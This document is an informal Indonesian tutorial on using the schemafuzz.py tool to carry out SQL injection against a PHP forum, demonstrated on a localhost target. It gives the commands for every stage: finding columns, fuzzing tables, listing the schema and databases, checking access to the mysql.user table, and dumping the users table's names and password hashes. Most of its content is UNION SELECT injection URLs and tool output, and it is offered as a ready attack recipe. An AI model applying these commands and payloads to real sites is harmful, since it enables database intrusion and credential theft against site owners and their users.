Langsung aja tutornya ya
siapkan alat dan bahan sebagai berikut :
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://www.beenuarora.com/code/schemafuzz.py)
3.CMD
4.Konsole (bagi pengguna linux)
bagi pengguna windust ikuti langkah berikut
buka menu CMD kemudian masuk kedalam directori Cdengan menggunakan perintah
cd c:\ enter
c:\>schemafuzz.py enter
Bagi pengguna linux tinggal mengetikkan di konsloe perintah berikut
./schemafuz.py enter
oke
setalah masuk ke direktory schemafuzz
tingal ikuti langkah selanjutnya
1.Cari target
Misal: http://127.0.0.1/site/phpweb/forum.php?forum=1
sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.
caranya seperti ini ./schemafuzz.py -h help
kita temukan sebagian perintahnya seperti ini
–schema, –dbs, –dump, –fuzz, –info, –full, –findcol
langkah pertama
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1″ –findcol
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1–
[+] Evasion Used: “+” “–”
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5–
[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!
langkah kedua
————–
setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –fuzz
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–
[+] Evasion Used: “+” “–”
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns…
[+] Found a table called: mysql.user
[+] Now searching for columns inside table “mysql.user”
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table “mysql.user” for columns!
[-] [01:37:48]
[-] Total URL Requests 618
[-] Done
langkah ketiga
—————
Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D namadatabasenya
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D webthings
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–
[+] Evasion Used: “+” “–”
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database “webthings”
[+] Number of Tables: 33
[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,
author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,
full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,
count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,
city,state,icq,aim,sex,session,active,comments,
newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,
newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail
[-] [01:43:48]
[-] Total URL Requests 270
[-] Done
untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –info
maka akan tampil seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–
[+] Evasion Used: “+” “–”
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Do we have Access to MySQL Database: Yes <– w00t w00t
[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0×3a,password),2,3,4,5+FROM+mysql.user–
[+] Do we have Access to Load_File: No
[-] [01:46:51]
[-] Total URL Requests 3
[-] Done
ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe
untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dbs
akan tampil seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–
[+] Evasion Used: “+” “–”
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] webthings
[-] [01:58:17]
[-] Total URL Requests 30
[-] Done
langkah selanjutnya
——————–
cara untuk menemukan user dan password
kita gunakan perintah –dump -D namadatabase -T namatabel -C namakolom
setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dump -D webthing -T wt_users -C name,password
eing ing eng….
jreennnng….keluar deh user ama passwordnya
hasilnya dibawah ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–
[+] Evasion Used: “+” “–”
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Dumping data from database “webthings” Table “wt_users”
[+] Column(s) ['name', 'password']
[+] Number of Rows: 2
[0] admin:e00b29d5b34c3f78df09d45921c9ec47:
[1] user:098f6bcd4621d373cade4e832627b4f6:
[-] [02:08:48]
[-] Total URL Requests 4
[-] Done
jangan lupa kita selalu mengecek schemafuzzlog.txt nya